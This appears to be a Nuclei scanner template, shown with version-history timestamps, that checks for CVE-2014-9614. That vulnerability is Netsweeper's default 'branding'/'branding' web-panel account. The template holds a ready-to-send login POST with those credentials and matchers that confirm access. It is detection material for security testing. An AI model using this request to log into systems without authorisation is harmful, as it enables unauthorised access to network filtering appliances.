nuclei-templates/cves/2014/CVE-2014-9614.yaml

47 lines
1.2 KiB
YAML
Raw Normal View History

2021-12-06 16:48:38 +00:00
id: CVE-2014-9614
2021-12-06 16:38:54 +00:00
info:
name: Netsweeper 4.0.5 - Default Weak Account
author: daffainfo
2021-12-07 07:43:49 +00:00
severity: critical
description: The Web Panel in Netsweeper before 4.0.5 has a default password of 'branding' for the branding account, which makes it easier for remote attackers to obtain access via a request to webadmin/.
2021-12-07 07:43:49 +00:00
reference:
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- https://nvd.nist.gov/vuln/detail/CVE-2014-9614
classification:
2021-12-06 16:48:38 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2014-9614
cwe-id: CWE-798
2021-12-07 07:43:49 +00:00
tags: cve,cve2021,netsweeper,default-login
2021-12-06 16:38:54 +00:00
requests:
- raw:
- |
POST /webadmin/auth/verification.php HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
2021-12-07 07:43:49 +00:00
Referer: {{BaseURL}}/webadmin/start/
2021-12-06 16:38:54 +00:00
login=branding&password=branding&Submit=Login
matchers-condition: and
matchers:
- type: status
status:
- 302
2021-12-07 07:43:49 +00:00
2021-12-06 16:38:54 +00:00
- type: word
2021-12-07 07:43:49 +00:00
part: header
2021-12-06 16:38:54 +00:00
words:
- 'Location: ../common/'
2021-12-07 07:43:49 +00:00
- 'Location: ../start/'
condition: or
- type: word
2021-12-06 16:38:54 +00:00
part: header
2021-12-07 07:43:49 +00:00
words:
- 'Set-Cookie: webadminU='
# Enhanced by mp on 2022/02/25